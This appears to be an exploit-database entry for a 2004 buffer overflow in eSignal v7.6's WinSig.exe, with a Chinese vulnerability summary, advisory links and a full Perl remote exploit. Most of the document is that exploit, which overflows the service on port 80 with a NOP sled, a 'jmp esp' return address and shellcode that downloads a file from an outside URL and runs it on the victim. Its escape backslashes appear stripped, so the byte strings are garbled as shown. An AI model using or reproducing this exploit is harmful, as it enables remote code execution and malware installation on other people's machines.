https://www.exploit-db.com/exploits/166
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200403-108

eSignal可提供实时的金融和证券信息的系统。eSignal包含的”WinSig.exe”应用程序在处理数据请求时存在问题，远程攻击者可以利用这个漏洞进行缓冲区溢出攻击，可能以进程权限在系统上执行任意指令。提交超长请求给”WinSig.exe”监听的80端口，当处理此类请求时，如果参数字符串超过1040字符，可触发典型的缓冲区溢出，精心构建提交数据，可能以进程权限在系统上执行任意指令。

#!/usr/bin/perl
#
# eSignal v7.6 remote exploit (c) VizibleSoft =*= http://viziblesoft.com/insect
#
# 25-mAR-2004
#

use IO::Socket;

sub usage 
{
   die("nUsage: perl $0 host portn");
}

print "rneSignal v7.6 remote exploit, (c) VizibleSoft.comrn";

my $ip      = $ARGV[0] || usage();
my $port    = $ARGV[1] || usage();
my $data    = "";
my $ret     = "xf3x7bx20x7c";	# MFC71.dll "jmp esp"
my $nop     = "x90";

#
# Used api..
#

$api  = "x00wininet.dllx00InternetOpenAx00".
	"InternetOpenUrlAx00InternetReadFilex00kernel32.dllx00".
	"_lcreatx00_lwritex00_lclosex00";

#
# Url of file to execute
#

$url = "http://viziblesoft.com/insect/sploits/troy.exe";

#
#
# Filename for our file on remote system

$fname = "setup.exe";

#
#
# Shellcode: downloads and executes file at URL
#

$shellc = "x90".
"x8BxECx03xEAxB8xEAxFExFFxFFxF7xD0x03xE8x83xC5x0Bx8BxFDx4FxF7".
"x17x83xC7x04x83x3FxFFx7CxF6xF7x17xB8x5Cx12x14x7Cx8Bx18x55xFF".
"xD3x8BxF8x33xC9xB1x03x8Dx55x0CxB8x58x12x14x7Cx8Bx18x51x52x52".
"x57xFFxD3x5Ax59x89x02x83xC2x03x42x8Ax02x3AxC5x7FxF9x42xFExC9".
"x3AxCDx7FxDExB8x5Cx12x14x7Cx8Bx18x8Dx55x3Cx52xFFxD3x8BxF8xB8".
"x58x12x14x7Cx8Bx18x53x8Dx55x49x52x52x57xFFxD3x5Ax89x02x8Bx1C".
"x24x8Dx55x51x52x52x57xFFxD3x5Ax89x02x5Bx8Dx55x59x52x52x57xFF".
"xD3x5Ax89x02x33xD2x52x52x52x52x55xFFx55x0Cx33xD2x52xB6x80xC1".
"xE2x10x52x33xD2x52x52x8Dx4Dx60x41x51x50xFFx55x1Ax89x45x1Ax33".
"xD2x52x8Dx55xF6x52xFFx55x49x89x45x49x33xD2xB6x02x2BxE2x83xEC".
"x04x33xD2xB6x02x54x8BxC4x83xC0x08x52x50x8Bx45x1Ax50xFFx55x2B".
"x8Bx04x24x8Dx54x24x04x50x52x8Bx45x49x50xFFx55x51x83x3Cx24x01".
"x7DxD7x8Bx45x49x50xFFx55x59x8Dx55xF6x52xB8x3Fx0Ex81xF8x35x80".
"x80x80x80xFFxD0xB8xD3xFCx80xF8x35x80x80x80x80xFFxE0$fname";

$movsb = "x90x33xc9xb5x02xb1xccx8bxf4x2bxf1x8bxfcx33xd2xb2x15x03xfaxf3xa4";

#
# xor data block
#

$url = $api . $url;
for(my $i=0; $i<length($url); $i++) {
		$data = $data . (substr($url, $i, 1) ^ "xff"); 
	};

$data .= "xffxffxfexfexffxffxffxff";

#
# construct overflow string...
#

$shellc .= $data;
$shellc .= ("xcc" x (712 - length($shellc)));

$shellcode = $nop x (8 * 16) .
	     $shellc .
	     $ret .
	     $movsb .
	     $nop x (191-16);


# print "shellcode len: " . length($shellcode) . "rn";

$data = '<STREAMQUOTE>' . $shellcode . 	'</STREAMQUOTE>';

# print "sending data of len: " . length($data) . "n";

print sendraw($data);

print "[+] Overflow sent / file executed!n";
exit;

sub sendraw {
        my ($pstr)=@_;
        my $target;
        $target= inet_aton($ip) || die("[-] inet_aton problems");
        socket(S,2,1,getprotobyname('tcp')||0) || die("[-] Socket problemsn");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                select(S);              $|=1;
                print $pstr;            my @in=<S>;
                select(STDOUT);         close(S);
                return @in;
        } else { die("[-] Can't connect...n"); }}

# milw0rm.com [2004-03-26]

来源:XF
名称:esignal-specs-bo(15624)
链接:http://xforce.iss.net/xforce/xfdb/15624
来源:BID
名称:9978
链接:http://www.securityfocus.com/bid/9978
来源:SECUNIA
名称:11222
链接:http://secunia.com/advisories/11222
来源:BUGTRAQ
名称:20040406Re:eSignalv7remotebufferoverflow
链接:http://archives.neohapsis.com/archives/bugtraq/2004-04/0056.html
来源:viziblesoft.com
链接:http://viziblesoft.com/insect/advisories/vz012004-esignal7.txt
来源:BUGTRAQ
名称:20040325eSignalv7remotebufferoverflow(exploit)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108025234317408&w;=2